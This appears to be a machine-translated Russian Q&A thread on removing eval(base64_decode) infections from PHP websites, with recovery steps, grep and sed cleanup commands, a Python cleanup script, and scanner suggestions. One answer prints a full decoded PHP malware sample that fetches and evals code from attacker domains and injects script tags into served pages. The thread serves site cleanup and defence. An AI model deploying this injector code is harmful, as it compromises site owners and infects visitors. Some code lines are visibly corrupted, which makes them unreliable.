Как избавиться от eval-base64_decode, как файлы вирусов PHP?

Ответ 1

Шаги по восстановлению и лечению вашего сайта (при наличии хорошей резервной копии).

1) Выключение сайта

Вам нужно в основном закрыть дверь на ваш сайт, прежде чем выполнять свою коррекционную работу. Это предотвратит доступ посетителей к вредоносному коду, просмотр сообщений об ошибках и т.д. Просто хорошая практика.

Вы должны сделать это, поместив следующее в свой файл .htaccess в веб-корне. (Замените "Ваш IP-адрес здесь!" С вашим собственным IP-адресом - см. http://icanhazip.com, если вы не знаете свой IP-адрес.)

order deny,allow
deny from all
allow from !!Your IP Address Here!!

2) Загрузите копию всех ваших файлов с сервера

Загрузите все в отдельную папку из ваших резервных копий. Это может занять некоторое время (в зависимости от размера вашего сайта, скорости соединения и т.д.).

3) Загрузите и установите программу сравнения файлов/папок

На компьютере с Windows вы можете использовать WinMerge - http://winmerge.org/ - он бесплатный и достаточно мощный. На машине MacOS просмотрите список возможных альтернатив из Alternative.to

4) Запустите утилиту сравнения файлов/папок

Вы должны получить несколько разных результатов:

• Файлы идентичны. Текущий файл совпадает с вашим резервным копированием, поэтому он не изменяется.
• Файл только с левой или с правой стороны - этот файл существует только в резервной копии (и может быть удален с сервера) или существует только на сервере (и, возможно, был взломан/создан хакером).
• Файл отличается. Файл на сервере не совпадает с файлом в резервной копии, поэтому он может быть изменен вами (для его настройки для сервера) или хакером (для ввода кода).

5) Разрешить различия

(a.k.a "Почему мы не можем просто ладить?" )

Для файлов, которые являются идентичными, никаких дополнительных действий не требуется. Для файлов, которые существуют только на одной стороне, посмотрите файл и выясните, являются ли они законными (например, пользовательские загрузки, которые должны быть там, дополнительные файлы, которые вы могли добавить, и т.д.). Для файлов, которые отличаются друг от друга, посмотрите на файл (Утилита разницы файлов может даже показать вам, какие строки были добавлены/изменены/удалены) и посмотрите, действительно ли версия сервера. Перезапишите (с резервной копией) любые файлы, содержащие вредоносный код.

6) Просмотрите свои меры предосторожности

Независимо от того, как это изменить ваши пароли FTP/cPanel или пересмотреть использование внешних/неконтролируемых ресурсов (как вы говорите, вы выполняете много fgets, fopens и т.д., вы можете проверить передаваемые параметры их как способ заставить скрипты вредоносного кода) и т.д.

7) Проверьте работу сайта

Возьмите возможность быть единственным человеком, который смотрит на сайт, чтобы убедиться, что все по-прежнему работает, как ожидалось, после исправления зараженных файлов и удаления вредоносных файлов.

8) Откройте дверцы

Отмените изменения, сделанные в файле .htaccess на шаге 1. Следите внимательно. Следите за сообщениями посетителей и журналов ошибок, чтобы узнать, пытается ли кто-либо инициировать удаленные вредоносные файлы и т.д.

9) Рассмотрим автоматизированные методы обнаружения

Существует несколько решений, позволяющих вам выполнить автоматическую проверку на вашем хосте (используя задание CRON), которое будет обнаруживать и детализировать любые изменения, которые происходят. Некоторые из них немного подробные (вы получите электронное письмо для каждого измененного файла), но вы должны быть в состоянии адаптировать их к вашим потребностям:

• Tripwire - PHP script для обнаружения и отправки новых, удаленных или измененных файлов
• Shell script для мониторинга изменений файлов
• Как определить, взломан ли ваш веб-сервер и получить предупреждение

10) Запланированное резервное копирование и сохранение хорошего скобки

Убедитесь, что на вашем сайте запланировано резервное копирование, сохраните несколько из них, так что у вас есть разные шаги, которые вы можете вернуться вовремя, если это необходимо. Например, если вы выполняли еженедельные резервные копии, вы можете сохранить следующее:

• 4 x Еженедельные резервные копии
• 4 x Ежемесячное резервное копирование (вы сохраняете одно из Еженедельных резервных копий, возможно, первую неделю месяца, как Ежемесячное резервное копирование).

Это всегда облегчит жизнь, если у вас кто-то атакует ваш сайт чем-то более разрушительным, чем атака с инъекцией кода.

О, и убедитесь, что вы также создаете резервные копии своих баз данных - с большим количеством сайтов, основанных на CMS, с хорошими файлами, но если вы потеряете/испортите базу данных позади них, ну, резервные копии в основном бесполезны.

Ответ 2

Сначала отключите свой сайт, пока не выясните, как он попал и как его исправить. Это похоже на то, что он вредит вашим клиентам.

Затем выполните поиск через ваши php файлы для fgets, fopen, fputs, eval или system. Я рекомендую notepad ++ из-за его функции "Найти в файлах". Кроме того, убедитесь, что это единственное место, где был изменен ваш PHP. У вас есть автономная копия для сравнения?

Ответ 3

Я страдал от той же взломанной работы. Мне также удалось расшифровать код, и, хотя у меня появился другой php-код, я начал с удаления вложенного PHP-текста, перейдя через каждый php файл на сайте и удалив eval-вызов. Я до сих пор изучаю, как я это начал, но вот что мое выглядело после дешифрования с этого сайта:

Для декодирования зашифрованного PHP скрипт в каждом файле php используйте это: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

И форматирование результата с помощью этого парня: http://beta.phpformatter.com/

Для очистки вам нужно удалить строку "eval" из верхней части каждого php файла и удалить папки .log из базовой папки веб-сайта.

Я нашел python script, который я немного изменил, чтобы удалить троян в php файлах, поэтому отправлю его здесь для использования другими: источник кода из потока: заменить ВСЕ экземпляры символа другим во всех файлах иерархически в дереве каталогов

import os
import re
import sys

def try_to_replace(fname):
    if replace_extensions: 
        return fname.lower().endswith(".php")
    return True


def file_replace(fname, pat, s_after):
    # first, see if the pattern is even in the file.
    with open(fname) as f:
        if not any(re.search(pat, line) for line in f):
            return # pattern does not occur in file so we are done.

    # pattern is in the file, so perform replace operation.
    with open(fname) as f:
        out_fname = fname + ".tmp"
        out = open(out_fname, "w")
        for line in f:
            out.write(re.sub(pat, s_after, line))
        out.close()
        os.rename(out_fname, fname)


def mass_replace(dir_name, s_before, s_after):
    pat = re.compile(s_before)
    for dirpath, dirnames, filenames in os.walk(dir_name):
        for fname in filenames:
            if try_to_replace(fname):
                print "cleaning: " + fname
                fullname = os.path.join(dirpath, fname)
                file_replace(fullname, pat, s_after)

if len(sys.argv) != 2:
    u = "Usage: rescue.py <dir_name>\n"
    sys.stderr.write(u)
    sys.exit(1)

mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "")

использовать тип

python rescue.py корневая папка

Это то, что пытался сделать злонамеренный script:

<?php

if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        function get_tds_777($url)
        {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false)
                return $content;

            $content = @tryfile_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfopen_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false)
                return $content;
            $content = @trysocket_777($url);
            if ($content !== false)
                return $content;
            return '';
        }

        function trycurl_777($url)
        {
            if (function_exists('curl_init') === false)
                return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "")
                return false;
            return $result;
        }
        function tryfile_777($url)
        {
            if (function_exists('file') === false)
                return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfopen_777($url)
        {
            if (function_exists('fopen') === false)
                return false;
            $buf = '';
            $f   = @fopen($url, 'r');
            if ($f) {
                while (!feof($f)) {
                    $buf .= fread($f, 10000);
                }
                fclose($f);
            } else
                return false;
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfsockopen_777($url)
        {
            if (function_exists('fsockopen') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $f    = @fsockopen($host, 80, $errno, $errstr, 30);
            if (!$f)
                return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (!feof($f)) {
                $buf .= fread($f, 10000);
            }
            fclose($f);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function trysocket_777($url)
        {
            if (function_exists('socket_create') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $ip1  = @gethostbyname($host);
            $ip2  = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2)
                return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ([email protected]_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf .= $t;
            }
            @socket_close($sock);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function update_tds_file_777($tdsfile)
        {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val     = get_tds_777($actual1);
            if ($val == "")
                $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        function get_actual_tds_777()
        {
            $defaultdomain = $_SERVER['s_d1'];
            $dir           = $_SERVER['s_p1'];
            $tdsfile       = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c   = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }
        function is_mac_777($ua)
        {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }
        function is_msie_777($ua)
        {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
                $msie = 1;
            return $msie;
        }
        function setup_globals_777()
        {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if ([email protected]_dir($rz)) {
                @mkdir($rz);
                if (@is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if ([email protected]_dir($rz)) {
                        @mkdir($rz);
                        if (@is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua  = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
                $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google"))
                $bot = 1;
            $msie = 0;
            if (is_msie_777($ua))
                $msie = 1;
            $mac = 0;
            if (is_mac_777($ua))
                $mac = 1;
            if (($msie == 0) && ($mac == 0))
                $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1']     = $mz;
            $_SERVER['s_b1']     = $bot;
            $_SERVER['s_t1']     = 1200;
            $_SERVER['s_d1']     = base64_decode('http://ens122zzzddazz.com/');
            $d                   = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1']     = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
            $_SERVER['s_a2']     = base64_decode('http://nlinthewood.com/g_load.php') . $d;
            $_SERVER['s_script'] = "nl.php?p=d";
        }
        setup_globals_777();
        if (!function_exists('gml_777')) {
            function gml_777()
            {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0)
                    $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
                return $r_string_777;
            }
        }
        if (!function_exists('gzdecodeit')) {
            function gzdecodeit($decode)
            {
                $t     = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v     = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start += 2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }
        function mrobh($content)
        {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }
        ob_start('mrobh');
    }
}

?> 

Ответ 4

Чтобы избавиться от этих вредоносных PHP, вам просто нужно их удалить. Если файл заражен, вам нужно удалить только ту часть, которая выглядит подозрительной.

Всегда сложно найти эти файлы, потому что, как правило, их несколько через ваш веб-корень.

Обычно, если вы видите какие-то обфускации, это красное предупреждение для вас.

Большинство вредоносных программ легко найти на основе общих функций, которые они используют, в том числе:

• base64_decode,
• lzw_decompress,
• eval,
• и т.д.

Используя формат кодирования, они уплотняют их размер и затрудняют их декодирование неопытными пользователями.

Вот несколько команд grep, которые могут найти наиболее распространенный вредоносный код PHP:

grep -R return.*base64_decode  .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

Вы можете запускать эти команды на сервере или после синхронизации своего веб-сайта с локальным компьютером (через FTP, например, ncftpget -R).

Или используйте инструменты сканирования, специально разработанные для поиска таких вредоносных файлов, см. сканеры безопасности PHP.

В целях обучения найдите следующую коллекцию сценариев эксплойта PHP, найденную при исследовании взломанных серверов, доступных по адресу kenorb/php-exploit-scripts GitHub (под влиянием @оригинальная коллекция Mattias). Это даст вам представление о том, как выглядят подозрительные файлы PHP, поэтому вы можете узнать, как их найти на своем сервере.

См. также: Что делает этот вредоносный PHP script?

Ответ 5

• Обеспечьте обновление любых популярных веб-приложений, таких как Wordpress или vBulletin. Есть много эксплойтов со старыми версиями, которые могут привести к сбою вашего сервера, и это, вероятно, произойдет снова, если они не будут обновлены. Не использовать при продолжении, пока это не будет сделано.

• Если файлы продолжают заменяться, тогда в фоновом режиме выполняется руткит или троян. Этот файл не может реплицироваться. Сначала вам придется сначала избавиться от руткита. Попробуйте rkhunter, chkrootkit и LMD. Сравните вывод ps aux с защищенным сервером и проверьте /var/tmp и /tmp на подозрительные файлы. Возможно, вам придется переустановить ОС.

• Убедитесь, что все рабочие станции, администрирующие сервер, обновлены и чисты. Не подключайтесь через небезопасные беспроводные соединения или используйте обычную текстовую аутентификацию, например, с FTP (вместо этого используйте SFTP). Только войдите в панели управления с https.

• Чтобы это не повторилось, запустите csf или сопоставимый брандмауэр, ежедневно LMD сканирует и остается в курсе последних обновлений безопасности для всех приложений на сервере.

Ответ 6

Мои веб-сайты или веб-сайты, на которых я принимаю, несколько раз подвергались ударам с подобными атаками.

Представляю, что я сделал, чтобы решить проблему. Я не делаю вид, что это лучший/простой подход, но он работает, и с тех пор я могу упреждающе держать мяч в своей области.

• решить проблему как можно скорее Я создал очень простой PHP скрипт (он был написан, когда железо было горячим, поэтому, возможно, это не самый оптимизированный код, но он решает проблему довольно быстро): http://www.ecommy.com/web-security/clean-php-files-from-eval-infection

• убедитесь, что знаете, когда что-то похожее на это снова. Хакеры используют все виды аплоасов из SQL-инъекции одного из ваших внешних модулей, которые вы устанавливаете, чтобы перенаправить вашу панель администратора со словарными атаками или очень хорошо известные шаблоны паролей, такие как 1qaz... qwerty.... и т.д. Я представляю сценарии здесь: http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections

• запись cron будет примерно такой: 0 2 * * 5/root/scripts/base64eval_scan > /dev/null 2 > & 1 &

Я обновил страницы, чтобы кто-то мог напрямую загрузить файлы. Надеюсь, он будет полезен для вас, как для меня:)

Ответ 7

Предполагая, что это сервер на базе Linux и у вас есть доступ к SSH, вы можете запустить это, чтобы удалить код нарушения:

find . -name "*.php" | xargs sed -i '[email protected][ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;@@'

Это охватывает все известные реализации base64 и будет работать, будет ли текст base64 окружен одинарными или двойными кавычками

EDIT: теперь также работает с внутренними пробелами.